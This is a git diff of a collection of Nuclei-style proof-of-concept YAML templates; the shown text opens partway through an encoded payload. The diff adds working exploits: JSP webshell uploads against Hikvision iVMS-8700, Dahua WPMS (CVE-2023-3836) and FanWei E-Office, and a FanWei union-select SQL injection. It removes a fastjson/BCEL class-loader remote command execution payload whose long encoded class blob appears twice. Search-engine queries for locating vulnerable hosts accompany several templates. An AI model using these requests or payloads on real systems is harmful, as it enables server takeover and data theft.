8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 0ebd67934b..7f081b05e0 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml @@ -1,27 +1,48 @@ id: HIKVISION info: - name: HIKVISION + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + Content-Type: image/jpeg + + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + + - | + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: res_id + json: + - ".data.resourceUuid" + internal: true matchers: - - type: word - words: - - "nt authority\\system" + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/upload/dahua-wpms-addimgico-fileupload.yaml b/poc/upload/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/upload/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/upload/dahua-wpms-addimgico-fileupload.yaml @@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index aa02a4941d..8c93d2bd55 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml @@ -1,52 +1,39 @@ id: FanWei info: - name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: fofa-query: app="泛微-EOffice" hunter-query: web.title="泛微软件" - -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - http: - raw: - | - POST /webservice/upload.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl - Accept-Encoding: gzip - Connection: close + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip - ------WebKitFormBoundaryakbyiukl - Content-Disposition: form-data; name="file"; filename="a.php4" - Content-Type: application/octet-stream + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg - - ------WebKitFormBoundaryakbyiukl-- + - - | - GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: name - group: 1 - regex: - - '([/*0-9a-zA-Z]+)\.php4$' - internal: true + --e64bdf16c554bbc109cecef6451c26a4-- + req-condition: true matchers: - type: dsl dsl: - - body_2 == str2 - -# http://your-ip/attachment/回显的那串数字/a.php4 + - 'status_code_1 == 200 && len(body) > 0' + condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/upload/ecology_E-Office_upload.yaml b/poc/upload/ecology_E-Office_upload.yaml index aa02a4941d..4e7ede529c 100644 --- a/poc/upload/ecology_E-Office_upload.yaml +++ b/poc/upload/ecology_E-Office_upload.yaml @@ -1,52 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" - + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' http: - raw: - | - POST /webservice/upload.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl - Accept-Encoding: gzip - Connection: close - - ------WebKitFormBoundaryakbyiukl - Content-Disposition: form-data; name="file"; filename="a.php4" - Content-Type: application/octet-stream - - - ------WebKitFormBoundaryakbyiukl-- - - - | - GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: name - group: 1 - regex: - - '([/*0-9a-zA-Z]+)\.php4$' - internal: true + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate + Connection: close + req-condition: true matchers: - type: dsl dsl: - - body_2 == str2 - -# http://your-ip/attachment/回显的那串数字/a.php4 + - 'contains(body_1, "c4ca")' + condition: and diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml @@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file